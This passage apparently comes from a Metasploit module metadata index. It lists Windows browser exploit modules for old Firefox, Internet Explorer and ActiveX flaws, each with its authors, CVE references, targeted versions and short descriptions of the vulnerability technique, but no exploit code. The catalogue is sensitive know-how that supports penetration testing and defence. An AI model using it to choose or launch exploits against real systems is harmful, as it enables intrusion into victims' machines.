"description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.",
"references": [
"CVE-2013-0753",
"OSVDB-89021",
"BID-57209",
"ZDI-13-006",
"URL-http://www.mozilla.org/security/announce/2013/mfsa2013-16.html",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=814001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 17 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_firefox_xmlserializer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_interleaved_write": {
"name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption",
"full_name": "exploit/windows/browser/mozilla_interleaved_write",
"rank": 300,
"disclosure_date": "2010-10-25",
"type": "exploit",
"author": [
"unknown",
"scriptjunkie"
],
"description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.",
"references": [
"CVE-2010-3765",
"OSVDB-68905",
"BID-15352",
"EDB-15352",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222",
"URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_interleaved_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_mchannel": {
"name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability",
"full_name": "exploit/windows/browser/mozilla_mchannel",
"rank": 300,
"disclosure_date": "2011-05-10",
"type": "exploit",
"author": [
"regenrecht",
"Rh0",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECT's\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionally,\n a Windows 7 target was provided using Java 6 and below to avoid ASLR.",
"references": [
"CVE-2011-0065",
"OSVDB-72085",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986",
"URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Firefox 3.6.16 on Windows XP SP3",
"Firefox 3.6.16 on Windows 7 + Java"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/mozilla_mchannel.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_mchannel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_nssvgvalue": {
"name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability",
"full_name": "exploit/windows/browser/mozilla_nssvgvalue",
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
"author": [
"regenrecht",
"Lincoln <lincoln@corelan.be>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers) does not validate\n whether a given index is out of bounds. If a custom observer of nsSVGValue is created\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.",
"references": [
"CVE-2011-3658",
"OSVDB-77953",
"ZDI-12-056",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP - Firefox 7",
"Windows XP - Firefox 8 (<= 8.0.1)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_nssvgvalue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_nstreerange": {
"name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability",
"full_name": "exploit/windows/browser/mozilla_nstreerange",
"rank": 300,
"disclosure_date": "2011-02-02",
"type": "exploit",
"author": [
"regenrecht",
"xero"
],
"description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.",
"references": [
"CVE-2011-0073",
"OSVDB-72087",
"BID-47663",
"ZDI-11-157",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919",
"URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto (Direct attack against Windows XP, otherwise through Java, if enabled)",
"Firefox Runtime, fails with ASLR",
"Java Runtime (7.10.3052.4), best against ASLR",
"Java JVM (20.1.0.02)",
"Java Regutils (6.0.260.3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_nstreerange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mozilla_reduceright": {
"name": "Mozilla Firefox Array.reduceRight() Integer Overflow",
"full_name": "exploit/windows/browser/mozilla_reduceright",
"rank": 300,
"disclosure_date": "2011-06-21",
"type": "exploit",
"author": [
"Chris Rohlf",
"Yan Ivnitskiy",
"Matteo Memelli",
"dookie2000ca",
"sinn3r <sinn3r@metasploit.com>",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index to be used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compared to a\n typical browser exploit) in order to gain control of the machine.",
"references": [
"CVE-2011-2371",
"OSVDB-73184",
"EDB-17974",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Mozilla Firefox 3.6.16 (no JAVA)",
"Mozilla Firefox 3.6.16 (JAVA)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mozilla_reduceright.rb",
"is_install_path": true,
"ref_name": "windows/browser/mozilla_reduceright",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms03_020_ie_objecttype": {
"name": "MS03-020 Microsoft Internet Explorer Object Type",
"full_name": "exploit/windows/browser/ms03_020_ie_objecttype",
"rank": 300,
"disclosure_date": "2003-06-04",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>"
],
"description": "This module exploits a vulnerability in Internet Explorer's\n handling of the OBJECT type attribute.",
"references": [
"CVE-2003-0344",
"OSVDB-2967",
"BID-7806",
"MSB-MS03-020"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT/XP/2003 Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms03_020_ie_objecttype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms05_054_onload": {
"name": "MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",
"full_name": "exploit/windows/browser/ms05_054_onload",
"rank": 300,
"disclosure_date": "2005-11-21",
"type": "exploit",
"author": [
"Benjamin Tobias Franz",
"Stuart Pearson",
"Sam Sharps"
],
"description": "This bug is triggered when the browser handles a JavaScript 'onLoad' handler in\n conjunction with an improperly initialized 'window()' JavaScript function.\n This exploit results in a call to an address lower than the heap. The javascript\n prompt() places our shellcode near where the call operand points to. We call\n prompt() multiple times in separate iframes to place our return address.\n We hide the prompts in a popup window behind the main window. We spray the heap\n a second time with our shellcode and point the return address to the heap. I use\n a fairly high address to make this exploit more reliable. IE will crash when the\n exploit completes. Also, please note that Internet Explorer must allow popups\n in order to continue exploitation.",
"references": [
"MSB-MS05-054",
"CVE-2005-1790",
"OSVDB-17094",
"BID-13799",
"URL-http://www.cvedetails.com/cve/CVE-2005-1790"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer 6 on Windows XP",
"Internet Explorer 6 Windows 2000"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms05_054_onload.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms05_054_onload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_001_wmf_setabortproc": {
"name": "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",
"full_name": "exploit/windows/browser/ms06_001_wmf_setabortproc",
"rank": 500,
"disclosure_date": "2005-12-27",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"san <san@xfocus.org>",
"O600KO78RUS <O600KO78RUS@unknown.ru>"
],
"description": "This module exploits a vulnerability in the GDI library included with\n Windows XP and 2003. This vulnerability uses the 'Escape' metafile function\n to execute arbitrary code through the SetAbortProc procedure. This module\n generates a random WMF record stream for each request.",
"references": [
"CVE-2005-4560",
"OSVDB-21987",
"MSB-MS06-001",
"BID-16074",
"URL-http://www.microsoft.com/technet/security/advisory/912840.mspx",
"URL-http://wvware.sourceforge.net/caolan/ora-wmf.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP/2003/Vista Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_001_wmf_setabortproc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_013_createtextrange": {
"name": "MS06-013 Microsoft Internet Explorer createTextRange() Code Execution",
"full_name": "exploit/windows/browser/ms06_013_createtextrange",
"rank": 300,
"disclosure_date": "2006-03-19",
"type": "exploit",
"author": [
"Faithless <rhyskidd@gmail.com>",
"Darkeagle <unl0ck.net>",
"hdm <x@hdm.io>",
"justfriends4n0w <justfriends4n0w@yahoo.com>",
"Unknown"
],
"description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer.\n Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n to a very remote, non-existent memory location. This module is the result of merging three\n different exploit submissions and has only been reliably tested against Windows XP SP2.\n This vulnerability was independently discovered by multiple parties. The heap spray method\n used by this exploit was pioneered by Skylined.",
"references": [
"CVE-2006-1359",
"OSVDB-24050",
"MSB-MS06-013",
"BID-17196",
"US-CERT-VU-876678",
"URL-http://secunia.com/secunia_research/2006-7/advisory/",
"URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html",
"URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)",
"Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_013_createtextrange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_055_vml_method": {
"name": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution",
"full_name": "exploit/windows/browser/ms06_055_vml_method",
"rank": 300,
"disclosure_date": "2006-09-19",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Aviv Raff <avivra@gmail.com>",
"Trirat Puttaraksa (Kira) <trir00t@gmail.com>",
"Mr.Niega <Mr.Niega@gmail.com>",
"M. Shirk <shirkdog_list@hotmail.com>"
],
"description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.",
"references": [
"CVE-2006-4868",
"OSVDB-28946",
"MSB-MS06-055",
"BID-20096"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT 4.0 -> Windows 2003 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_055_vml_method.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_055_vml_method",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_057_webview_setslice": {
"name": "MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow",
"full_name": "exploit/windows/browser/ms06_057_webview_setslice",
"rank": 300,
"disclosure_date": "2006-07-17",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a flaw in the WebViewFolderIcon ActiveX control\n included with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n during the Month of Browser Bugs project (MoBB #18).",
"references": [
"CVE-2006-3730",
"OSVDB-27110",
"MSB-MS06-057",
"BID-19030"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_057_webview_setslice.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_057_webview_setslice",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_067_keyframe": {
"name": "MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",
"full_name": "exploit/windows/browser/ms06_067_keyframe",
"rank": 300,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"Alexander Sotirov <asotirov@determina.com>",
"skape <mmiller@hick.org>"
],
"description": "This module exploits a heap overflow vulnerability in the KeyFrame method of the\n direct animation ActiveX control. This is a port of the exploit implemented by\n Alexander Sotirov.",
"references": [
"CVE-2006-4777",
"OSVDB-28842",
"BID-20047",
"MSB-MS06-067"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000/XP/2003 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms06_067_keyframe.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_067_keyframe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms06_071_xml_core": {
"name": "MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling",
"full_name": "exploit/windows/browser/ms06_071_xml_core",
"rank": 300,
"disclosure_date": "2006-10-10",
"type": "exploit",
"author": [
"Trirat Puttaraksa <trir00t@gmail.com>"
],
"description": "This module exploits a code execution vulnerability in Microsoft XML Core Services which\n exists in the XMLHTTP ActiveX control. This module is the modified version of\n http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n + Microsoft XML Core Services 4.0 SP2.",
"references": [
"CVE-2006-5745",
"OSVDB-29425",
"MSB-MS06-071",
"BID-20915"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 -> Windows 2003 SP0"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms06_071_xml_core.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms06_071_xml_core",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms07_017_ani_loadimage_chunksize": {
"name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",
"full_name": "exploit/windows/browser/ms07_017_ani_loadimage_chunksize",
"rank": 500,
"disclosure_date": "2007-03-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Solar Eclipse <solareclipse@phreedom.org>"
],
"description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function in USER32.dll. The flaw can be triggered through\n Internet Explorer 6 and 7 by using the CURSOR style sheet directive\n to load a malicious .ANI file. The module can also exploit Mozilla\n Firefox by using a UNC path in a moz-icon URL and serving the .ANI file\n over WebDAV. The vulnerable code in USER32.dll will catch any\n exceptions that occur while the invalid cursor is loaded, causing the\n exploit to silently fail when the wrong target has been chosen.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.",
"references": [
"CVE-2007-0038",
"OSVDB-33629",
"BID-23194",
"MSB-MS07-017",
"URL-http://www.microsoft.com/technet/security/advisory/935423.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista",
"IE6 on Windows NT, 2000, XP, 2003 (all languages)",
"IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)",
"IE7 and Firefox on Windows Vista (all languages)",
"Firefox on Windows XP (English)",
"Firefox on Windows 2003 (English)"
],
"mod_time": "2017-10-19 19:55:58 +0000",
"path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_041_snapshotviewer": {
"name": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/ms08_041_snapshotviewer",
"rank": 600,
"disclosure_date": "2008-07-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a user's file system\n via the Microsoft Office Snapshot Viewer ActiveX Control.",
"references": [
"CVE-2008-2463",
"OSVDB-46749",
"MSB-MS08-041",
"BID-30114"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_041_snapshotviewer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_053_mediaencoder": {
"name": "Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/ms08_053_mediaencoder",
"rank": 300,
"disclosure_date": "2008-09-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Windows Media Encoder 9. When\n sending an overly long string to the GetDetailsString() method of wmex.dll\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-3008",
"OSVDB-47962",
"BID-31065",
"MSB-MS08-053"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 IE 6.0 SP0-SP2"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms08_053_mediaencoder.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_053_mediaencoder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_070_visual_studio_msmask": {
"name": "Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/ms08_070_visual_studio_msmask",
"rank": 300,
"disclosure_date": "2008-08-13",
"type": "exploit",
"author": [
"koshi",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n When passing a specially crafted string to the Mask parameter of the\n Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2008-3704",
"OSVDB-47475",
"BID-30674",
"MSB-MS08-070"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 IE 6.0 SP0-SP2"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_070_visual_studio_msmask",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms08_078_xml_corruption": {
"name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption",
"full_name": "exploit/windows/browser/ms08_078_xml_corruption",
"rank": 300,
"disclosure_date": "2008-12-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.",
"references": [
"CVE-2008-4844",
"OSVDB-50622",
"BID-32721",
"MSB-MS08-078",
"URL-http://www.microsoft.com/technet/security/advisory/961051.mspx",
"URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms08_078_xml_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_002_memory_corruption": {
"name": "MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption",
"full_name": "exploit/windows/browser/ms09_002_memory_corruption",
"rank": 300,
"disclosure_date": "2009-02-10",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "This module exploits an error related to the CFunctionPointer function when attempting\n to access uninitialized memory. A remote attacker could exploit this vulnerability to\n corrupt memory and execute arbitrary code on the system with the privileges of the victim.",
"references": [
"CVE-2009-0075",
"OSVDB-51839",
"MSB-MS09-002"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 / Windows Vista SP0 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms09_002_memory_corruption.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_002_memory_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_043_owc_htmlurl": {
"name": "Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",
"full_name": "exploit/windows/browser/ms09_043_owc_htmlurl",
"rank": 300,
"disclosure_date": "2009-08-11",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Microsoft's Office Web Components.\n When passing an overly long string as the \"HTMLURL\" parameter an attacker can\n execute arbitrary code.",
"references": [
"CVE-2009-1534",
"OSVDB-56916",
"BID-35992",
"MSB-MS09-043",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 - IE6 - Office XP SP0",
"Windows XP SP3 - IE6 - Office XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_043_owc_htmlurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_043_owc_msdso": {
"name": "Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",
"full_name": "exploit/windows/browser/ms09_043_owc_msdso",
"rank": 300,
"disclosure_date": "2009-07-13",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>",
"Ahmed Obied",
"DSR! <xchwarze@gmail.com>"
],
"description": "This module exploits a memory corruption vulnerability within versions 10 and 11 of\n the Office Web Component Spreadsheet ActiveX control. This module was based on\n an exploit found in the wild.",
"references": [
"CVE-2009-1136",
"OSVDB-55806",
"MSB-MS09-043",
"URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py",
"EDB-9163",
"URL-http://www.microsoft.com/technet/security/advisory/973472.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_043_owc_msdso",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms09_072_style_object": {
"name": "MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption",
"full_name": "exploit/windows/browser/ms09_072_style_object",
"rank": 300,
"disclosure_date": "2009-11-20",
"type": "exploit",
"author": [
"securitylab.ir <K4mr4n_st@yahoo.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the getElementsByTagName function\n as implemented within Internet Explorer.",
"references": [
"MSB-MS09-072",
"CVE-2009-3672",
"OSVDB-50622",
"BID-37085",
"URL-http://www.microsoft.com/technet/security/advisory/977981.mspx",
"URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms09_072_style_object.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms09_072_style_object",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_002_aurora": {
"name": "MS10-002 Microsoft Internet Explorer \"Aurora\" Memory Corruption",
"full_name": "exploit/windows/browser/ms10_002_aurora",
"rank": 300,
"disclosure_date": "2010-01-14",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>"
],
"description": "This module exploits a memory corruption flaw in Internet Explorer. This\n flaw was found in the wild and was a key component of the \"Operation Aurora\"\n attacks that led to the compromise of a number of high profile companies. The\n exploit code is a direct port of the public sample published to the Wepawet\n malware analysis site. The technique used by this module is currently identical\n to the public sample; as such, only Internet Explorer 6 can be reliably exploited.",
"references": [
"MSB-MS10-002",
"CVE-2010-0249",
"OSVDB-61697",
"URL-http://www.microsoft.com/technet/security/advisory/979352.mspx",
"URL-http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_002_aurora.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_002_aurora",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_002_ie_object": {
"name": "MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free",
"full_name": "exploit/windows/browser/ms10_002_ie_object",
"rank": 300,
"disclosure_date": "2010-01-21",
"type": "exploit",
"author": [
"Peter Vreugdenhil",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
